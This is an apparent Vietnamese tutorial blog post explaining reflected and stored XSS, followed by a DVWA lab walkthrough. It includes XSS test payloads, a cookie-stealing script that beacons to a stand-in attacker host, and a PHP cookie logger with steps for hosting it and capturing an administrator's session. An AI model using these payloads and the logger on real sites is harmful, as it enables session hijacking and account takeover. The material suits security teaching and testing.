Các Kiểu Khai Thác Lỗ Hổng XSS - Tấn Công Web Bằng Javascript

• TIN MỚI
  • Kiến thức hay
  • Tin Công nghệ
  • Đánh giá công nghệ
  • Tiền của tôi
  • Số hóa
  • Tin Giáo dục
  • Tin Giải trí
  • Ngữ pháp tiếng anh
  • Kinh nghiệm học tiếng anh
  • Xem Phim
  • Kinh nghiệm
• KHÓA HỌC CỦA BẠN
• Tin học văn phòng
  • Khóa học Tuyệt đỉnh Power BI
  • Khóa học lập trình VBA Excel
  • Khóa dựng phần mềm quản lý bằng MS ACCESS
  • Đào tạo Excel 2010 chuyên nghiệp
  • Đào tạo Word 2010 chuyên nghiệp
  • Đào tạo Powerpoint 2010 Pro
  • Đào tạo vẽ Visio 2010 chuyên nghiệp
  • Chứng chỉ MOS
• Ebook
• Kỹ Năng Mềm
  • Học Excel
  • Thủ thuật Excel
  • Excel nâng cao
  • Excel VBA
  • Google Sheets
  • Học Word
  • Học PowerPoint
  • Học Access
• Review Công nghệ
  • Đọc báo Song ngữ Anh- Việt
  • Tải Phần mềm
  • Hacker
  • Giải trí
  • Học tiếng anh
• Lập trình
  • Đào tạo lập trình Foxpro
  • Đào tạo lập trình ACCESS 2010
  • Đào tạo Lập trình Excel
  • Lập trình Web
  • Đào tạo Lập trình PHP
  • Đào tạo lập trình Mobile
• Tin công nghệ
  • Tin Bảo mật - An toàn thông tin
  • Giáo dục 4.0
• Học đồ họa
  • Đào tạo photoshop chuyên nghiệp
  • Đào tạo CorelDraw chuyên nghiệp
• Office
  • Đào tạo Excel 2013 của Microsoft
  • Đào tạo Word 2013 của Microsoft
  • Đào tạo Powerpoint 2013
  • Các chương trình khác
• Học Online
  • Hướng dẫn Tiếng anh
  • Thực hành Tiếng anh chuẩn quốc tế
  • Thư viện khóa học
  • Thực hành Tiếng anh giao tiếp
  • Bài giảng điện tử
• Công cụ hữu ích
  • Đọc số thành chữ
  • Tra cứu phím tắt Excel
  • Đọc công thức Excel Dễ hơn
  • Đếm số từ trong Văn bản
  • Đếm số ký tự trong Văn bản
  • Chuyển Văn bản thành Mp3
  • Tạo QrCode
  • Bộ soạn thảo trực tuyến
  • Bộ công cụ đặc biệt
  • Diễn đàn
• Phiên âm chuẩn
• SMS Free
• HỌ ĐINH

Home » Công nghệ số » HAcker » Các kiểu khai thác lỗ hổng XSS - Cross-Site Scripting - Tấn công Web bằng Javascript Các kiểu khai thác lỗ hổng XSS - Cross-Site Scripting - Tấn công Web bằng Javascript

Học viện đào tạo trực tuyến Thứ Năm, 9 tháng 4, 2015 0 No comments

Phần 1: Reflected XSS

Cross-Site Scripting (XSS) là một trong những kĩ thuật tấn công phổ biến nhất hiện nay, được mệnh danh là Godfather of Attack, và trong nhiều năm liền được liệt vào danh sách những kỹ thuật tấn công nguy hiểm nhất với ứng dụng web.

Không gọi là tắt là CSS để tránh nhầm lẫn với khái niệm Cascading Style Sheet của HTML.

Kỹ thuật XSS được thực hiện dựa trên việc chèn các đoạn script nguy hiểm vào trong source code ứng dụng web. Nhằm thực thi các đoạn mã độc Javascript để chiếm phiên đăng nhập của người dùng. Để hiểu rõ hơn, chúng ta xét ví dụ sau. Một ứng dụng web cho phép in ra giá trị mà chúng ta truyền vào thông qua URL, giả sử truyền vào biến name giá trị Ping Mọi chuyện đến giờ vẫn ổn, chúng ta xem lại source code html Điều dễ nhận thấy là giá trị tên mà chúng ta nhập vào đã được chèn vào source code. Vậy thì có khả năng là cái gì nhập vào cũng có thể được chèn vào. Vấn đề sẽ trở nên nghiêm trọng nếu như giá trị được nhập vào không phải là một chuỗi bình thường như trên mà là một đoạn mã lệnh có khả năng gây nguy hiểm, đại loại như thế này: <script>alert(document.cookie)</script> Thử lại với giá trị trên: Từ ví dụ này có thể kết luận 2 điều. Thứ nhất biến name có thể nhận giá trị đầu vào bất kỳ và truyền lên server xử lý. Thứ 2, server đã không kiểm soát giá trị đầu vào này trước khi trả về cho trình duyệt. Dẫn đến việc đoạn mã javascript đã bị chèn vào trong source code. XSS nói chung được chia làm 3 loại chính là Reflected, Stored và DOM based. Trong bài viết này tôi sẽ đề cập chính đến kỹ thuật Reflected XSS. Có đến 75% kỹ thuật XSS dựa trên Reflected XSS. Gọi là reflected(phản xạ) bởi vì trong kịch bản khai thác loại này, hacker phải gửi cho nạn nhân một URL có chứa đoạn mã nguy hiểm(thường là javascript). Nạn nhân chỉ cần request đến URL này thì ngay lập tức hacker sẽ nhận được respond chứa kết quả mong muốn(tính phản xạ thể hiện ở đây). Ngoài ra nó còn được biết đến với tên gọi first-order XSS.

Kịch bản khai thác trong thực tế

Có nhiều hướng để khai thác thông qua lỗi Reflected XSS, một trong những cách được biết đến nhiều nhất là chiếm phiên làm việc (session) của người dùng, từ đó có thể truy cập được dữ liệu và chiếm được quyền của họ trên website. Chi tiết được mô tả theo các bước như sau:

1. Người dùng đăng nhập web và giả sử được gán session: Set-Cookie: sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d4
2. Bằng cách nào đó, hacker gửi được cho người dùng URL: http://example.com/name=<script>var+i=new+Image;+i.src=”http://hacker-site.net/”%2bdocument.cookie;</script> Giả sử example.com là website nạn nhân truy cập, hacker-site.net là trang của hacker tạo ra
3. Nạn nhân truy cập đến URL trên
4. Server phản hồi cho nạn nhân, kèm với dữ liệu có trong request(đoạn javascript của hacker)
5. Trình duyệt nạn nhân nhận phản hồi và thực thi đoạn javascript
6. Đoạn javascript mà hacker tạo ra thực tế như sau: var i=new Image; i.src=”http://hacker-site.net/”+document.cookie; Dòng lệnh trên bản chất thực hiện request đến site của hacker với tham số là cookie người dùng: GET /sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d4 HTTP/1.1 Host: hacker-site.net
7. Từ phía site của mình, hacker sẽ bắt được nội dung request trên và coi như session của người dùng sẽ bị chiếm. Đến lúc này, hacker có thể giả mạo với tư cách nạn nhân và thực hiện mọi quyền trên website mà nạn nhân có.

Phần 2: Stored XSS (Persistent XSS) Trong bài trước, tôi đã giới thiệu về lỗi XSS (Cross Site Scripting) và hướng khai thác thực tế của XSS Reflected. Có một loại khác của XSS được xem là nguy hiểm hơn, đó là Stored XSS. Khác với Reflected tấn công trực tiếp vào một số nạn nhân mà hacker nhắm đến, Stored XSS hướng đến nhiều nạn nhân hơn. Lỗi này xảy ra khi ứng dụng web không kiểm tra kỹ các dữ liệu đầu vào trước khi lưu vào cơ sở dữ liệu (ở đây tôi dùng khái niệm này để chỉ database, file hay những khu vực khác nhằm lưu trữ dữ liệu của ứng dụng web). Ví dụ như các form góp ý, các comment … trên các trang web. Với kỹ thuật Stored XSS , hacker không khai thác trực tiếp mà phải thực hiện tối thiểu qua 2 bước. Đầu tiên hacker sẽ thông qua các điểm đầu vào (form, input, textarea…) không được kiểm tra kỹ để chèn vào CSDL các đoạn mã nguy hiểm. Tiếp theo, khi người dùng truy cập vào ứng dụng web và thực hiện các thao tác liên quan đến dữ liệu được lưu này, đoạn mã của hacker sẽ được thực thi trên trình duyệt người dùng. Đến đây hacker coi như đã đạt được mục đích của mình. Vì lí do này mà kỹ thuật Stored XSS còn được gọi là second-order XSS. Kịch bản khai thác được mô tả như hình sau: Reflected XSS và Stored XSS có 2 sự khác biệt lớn trong quá trình tấn công.

• Thứ nhất, để khai thác Reflected XSS, hacker phải lừa được nạn nhân truy cập vào URL của mình. Còn Stored XSS không cần phải thực hiện việc này, sau khi chèn được mã nguy hiểm vào CSDL của ứng dụng, hacker chỉ việc ngồi chờ nạn nhân tự động truy cập vào. Với nạn nhân, việc này là hoàn toàn bình thường vì họ không hề hay biết dữ liệu mình truy cập đã bị nhiễm độc.
• Thứ 2, mục tiêu của hacker sẽ dễ dàng đạt được hơn nếu tại thời điểm tấn công nạn nhân vẫn trong phiên làm việc(session) của ứng dụng web. Với Reflected XSS, hacker có thể thuyết phục hay lừa nạn nhân đăng nhập rồi truy cập đến URL mà hắn ta cung cấp để thực thi mã độc. Nhưng Stored XSS thì khác, vì mã độc đã được lưu trong CSDL Web nên bất cứ khi nào người dùng truy cập các chức năng liên quan thì mã độc sẽ được thực thi, và nhiều khả năng là những chức năng này yêu cầu phải xác thực(đăng nhập) trước nên hiển nhiên trong thời gian này người dùng vẫn đang trong phiên làm việc.

Từ những điều này có thể thấy Stored XSS nguy hiểm hơn Reflected XSS rất nhiều, đối tượng bị ảnh hưởng có thế là tất cả nhưng người sử dụng ứng dụng web đó. Và nếu nạn nhân có vai trò quản trị thì còn có nguy cơ bị chiếm quyền điều khiển web. Phần 3. Khai thác lỗ hổng XSS với Xenotix (DVWA)

Xenotix XSS Exploit Framework là một công cụ thử nghiệm xâm nhập để phát hiện và khai thác lỗ hổng XSS trong ứng dụng web. Công cụ này có thể tiêm các đoạn mã và một trang web mà nó có khả năng bị tổn thương tới lỗ hổng XSS. Nó là cơ bản là một danh sách các payload dựa trên các XSS Scanner và XSS Exploitation. Nó cung cấp cho người thử nghiệm xâm nhập khả năng để kiểm tra tất cả các XSS payloads có sẵn trong danh sách để tấn công ,ứng dụng web cho quá trình kiểm tra lỗ hổng XSS. Công cụ hỗ trợ cả chế độ tự động và chế độ bằng tay. XSS Exploit Framework bao gồm các công cụ XSS encoder, XSS keystroke logger, Executable Drive-by downloader, XSS Reverse Shell và XSS DDoSer. ****Dưới đây là cách khai thác lỗ hổng XSS (cơ bản). **Phần 1:Test lỗi. 1.Đầu tiên ta cần cài đặt DVWA.Link hướng dẫn ở đây http://svuit.com/showthread.php?109-...-lab-with-DVWA. 2.Sau đó ta vào thư mục cài đặt DVWA Tìm file .htaccess edit lai : # Limit access to localhost <Limit GET POST PUT> order deny,allow deny from all ---------> Sửa thành allow from all allow from 127.0.0.1 </Limit> 3.Tìm file index.php theo đường dẫn sau: dvwa\vulnerabilities\xss-s\index.phptìm: <div class=\"body_padded\"> -----> <textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"50\"></textarea></td> sửa maxlength từ 50 thành 200 nhu: <textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"200\"></textarea></td> 4.Vào web browser mở http://www.localhost/dvwa login vs username: admin password: password(mặc định nếu mốn ta có thể thay đổi sau). 5.Vào setup->Creat/reset database để tạo mới database nếu thành công thì sẽ có thông báo: database has been created.... 6.Chỉnh DVWA security từ high xuống low.Đây là mức bảo mật thấp nhất.Ta nên bắt đầu từ đây. 7.Vào xss storage 8.Sử dụng một số đoạn script cơ bản để soát lỗi xss cho website: <script>alert("XSS")</script> "><script>alert("XSS")</script> "><script>alert(String.fromCharCode(88,83,83)</script> '><script>alert("XSS")</script> '><script>alert(String.fromCharCode(88,83,83)</script> <ScRIPt>aLeRT("XSS")</ScRIPt> <ScRIPt><aLeRT(String.fromCharCode(88,83,83)</ScRIPt> Sau khi phát hiên ra những lỗ hổng ta chuyển qua phần 2. Phần 2.Sau khi phát hiện ra lỗi ta tấn công bang css 12*1.Tạo file cc.php để lấy cookies Nội dung file cc.php nhu sau: Code: <?php $cookie=$HTTP_GET_VAR["cookie"]; //Lấy cookie từ địa chỉ hiện tại và lưu trữ cookie trong biến $cookie $steal=fopen("logs.txt","a"); //Mở cookiefile để đính kèm các cookie lấy được fwrite($steal,$cookie."\n"); //Viết lại những cookie lấy được lưu trong file $steal fclose($steal); //Đóng lại cookiefiles. ?> file này có nhiệm vụ lấy cookies và ghi thông tin lên file logs.txt Sau đó tạo file logs.txt. Lưu ý phải chmod file logs.text về 777 12*2.Up các file cc.php và logs.text lên host (Lưu ý đây là host do attacker tạo ra. Các bạn có thể tạo host free trên trang www.000webhost.com) 12*3.Khai thác lỗ hổng css Chèn đoạn script độc vào textbox rồi gửi đi. Giả sử ta upload 2 file lên host của site có địa chỉ như sau: http://www.xss.com thì đoạn script có dạng như sau: <script>location.href='http://www.xss.com/cc.php?cookie='+document.cookie;</script> Chèn đoạn mã đó vào site dính lỗi xss.Khi admin view site thi cookie se duoc gui ve cho attacker. Kiểm tra file log trên web. Bước cuối cùng.Khai thác cookies lấy được.

Share !

Topics: Công nghệ số HAcker

About Học viện đào tạo trực tuyến

Xinh chào bạn. Tôi là Đinh Anh Tuấn - Thạc sĩ CNTT. Email: [email protected] . - Nhận đào tạo trực tuyến lập trình dành cho nhà quản lý, kế toán bằng Foxpro, Access 2010, Excel, Macro Excel, Macro Word, chứng chỉ MOS cao cấp, IC3, tiếng anh, phần mềm, phần cứng . - Nhận thiết kế phần mềm quản lý, Web, Web ứng dụng, quản lý, bán hàng,... Nhận Thiết kế bài giảng điện tử, số hóa tài liệu... HỌC VIỆN ĐÀO TẠO TRỰC TUYẾN:TẬN TÂM-CHẤT LƯỢNG. «

Next

Bài đăng Mới hơn

»

Previous

Bài đăng Cũ hơn

Bài đăng Mới hơn Bài đăng Cũ hơn Trang chủ

Bài đăng nổi bật

Khóa Đào Tạo Hacker Mũ Trắng

Nhấn vào đây để bắt đầu khóa học   Giúp học viên tìm hiểu cơ bản bản chuyên sâu kỹ năng hack website, sever, email, sms, facebook... Khóa...

Khóa học trực tuyến

Truy cập nhiều nhất

• Hướng dẫn về ASP.NET MVC và Action Result Nếu bạn đã từng làm việc trong một dự án ASP.NET MVC thì chắc chẳng còn xa lạ gì với khái niệm Action result mà ASP.NET MVC đã và đang cung...
• Cách dùng Termux để cài phần mềm Hack trên điện thoại Android Mục lục bài viết Termux là gì? Cách cài đặt Có thể dùng Termux để Hack không? Cách cài đặt các công cụ hack trên Termux Cài NMAP – Công cụ ...
• Hướng dẫn sử dụng phần mềm Anki - Học tiếng anh hiệu quả nhất Anki là một phần mềm được thiết kế để giúp bạn ghi nhớ các sự kiện, từ ngữ (chẳng hạn như từ ngữ trong một ngôn ngữ nước ngoài) một cách ...
• Apple tung video quảng cáo độ bền và camera của iPhone 11 Pro Apple vừa tung hai đoạn video ngắn để quảng cáo cho độ bền và 3 camera trên iPhone 11 Pro . Bạn sẽ thấy là iPhone 11 Pro bị ném nh...
• Phần mềm Bizagi Thiết kế, quản lý dữ liệu dự án cho doanh nghiệp Bizagi Modeler được thiết kế để diễn đạt hệ thống ký hiệu mô hình hóa tiến trình nghiệp vụ BPMN theo cấu trúc dự án, tiến tới mục tiêu tăng ...
• Bí kíp giúp ‘Bố già’ Tokuda giữ được sự sung mãn, đóng 400 phim JAV suốt 20 năm dù đã gần 90 tuổi   Diễn viên JAV Shigeo Tokuda cho rằng tuổi tác không hoàn toàn là vấn đề, xứng đáng danh hiệu "Made in Japan- gần 90 năm vẫn chạy tốt...
• 108 câu hỏi trắc nghiệm và đáp án môn Quản Trị Mạng Câu hỏi và đáp án Câu 1. Địa chỉ IP có độ dài bao nhiêu bit và được phân thành bao nhiêu lớp? a. 32 bit, 4 lớp (A, B,C,D) ...
• Giới thiệu cơ sở dữ liệu AdventureWorks Trước đây, khi nói tới cơ sở dữ liệu ví dụ của Microsoft chúng ta sẽ nghĩ ngay tới CSDL  Northwind , tuy nhiên từ khi giới thiệu SQL Server...
• symfony-Làm việc với dữ liệu Trong Doctrine bạn có thể lấy một kết quả phức tạp từ RDBMS và chuyển chúng vào một mảng hay object mô tả cấu trúc quan hệ của bạn. Điều nà...
• Trên tay điện thoại cổ: Motorola RAZR V3xx "mỏng như dao cạo", máy nguyên bản, nữ xài kỹ V3, V3i là những cái tên làm nên tên tuổi của Motorola cách đây 10 năm. Là hai sản phẩm giúp hãng có khả năng đứng vững bên cạnh cái tên ...

Tin công nghệ

Download

Danh mục bài viết

• 3ds Max
• access
• Adobe Illustrator
• AI
• android
• Articulate Storyline
• autoit
• Bài thuốc
• Cây xanh
• Cây xanh trong nhà
• CI Framework
• Clip ca nhạc
• Công nghệ Mobile
• Công nghệ mới
• Công nghệ số
• css
• DotnetNuke
• Download
• Đào tạo CorelDraw chuyên nghiệp
• Đào tạo photoshop chuyên nghiệp
• Định hướng lập trình
• Đọc sách
• excel
• facebook
• Foxpro
• Giải pháp excel chuyên nghiệp
• Giải trí
• Giáo dục
• Giới thiệu Phần mềm
• Google Apps Script
• Google Docs
• Google drive
• Google Sheets
• Google Slide
• HAcker
• Hàng khuyến mại
• hay
• Hệ thống Elearning Moodle
• Học tiếng anh
• Học từ Youtobe
• html
• Hướng dẫn xây dựng và quản lý JOOMLA
• Imacro
• ios apple
• Iphone
• Khoa học dữ liệu
• Khóa học hay
• Khóa học trực tuyến
• Kiểm thử phần mềm
• Kiến thức cơ bản
• Kiến thức cuộc sống
• Kinh doanh
• Kỹ năng
• lập trình
• Lập trình .NET
• Lập trình AngularJS
• Lập trình assembly
• Lập trình di động
• Lập trình Java
• Lập trình Javascript
• Lập trình Nodejs
• Lập trình PHP
• Machine Learning
• Microsoft Teams
• MP3
• Nấu ăn
• Nét xinh
• Ôn luyện thi chứng chỉ MOS
• phần cứng
• Phần mềm cho Bé và Cha mẹ
• PHP tool
• powerpoint
• Python
• Quản trị cơ sở dữ liệu SQL
• Quản trị dự án-công việc hiệu quả
• Quản Trị Mạng
• Sách nói
• Sách nổi tiếng - Best Seller
• Sáng tạo
• SEO-Tối ưu công cụ tìm kiếm
• skype
• SPSS
• Suy ngẫm hay
• Sức khỏe
• Symfony Framework
• tết
• Thiết kế đồ họa
• Tin hay
• Tin học Văn phòng
• Toeic 500-700
• Tranh treo
• Unity 3D
• vba
• visio
• web
• word
• wordpress
• Xây dựng bài giảng điện tử
• zalo

Nhóm Zalo CÔNG NGHỆ

Hiện nay có rất nhiều công việc mà bất cứ ai cũng có thể làm tốt khi không yêu cầu quá nhiều kiến thức chuyên môn, như: Bán hàng chẳng hạn. Ngồi một chỗ, với điện thoại và laptop là bạn có thể bán hàng 63 tỉnh thành, thậm chí toàn thế giới. Còn nếu bạn chưa biết bán hàng sao cho hiệu quả thì vào nhóm: HỌC VIỆN ĐÀO TẠO TRỰC TUYẾN.

Bảo hiểm nhân thọ - bảo vệ người trụ cột

HỌC VIỆN ĐÀO TẠO TRỰC TUYẾN-TẬN TÂM-CHẤT LƯỢNG © 2014. All Rights Reserved.

Designed by [email protected] Tel: 098 909 5293

Pages

• Trang chủ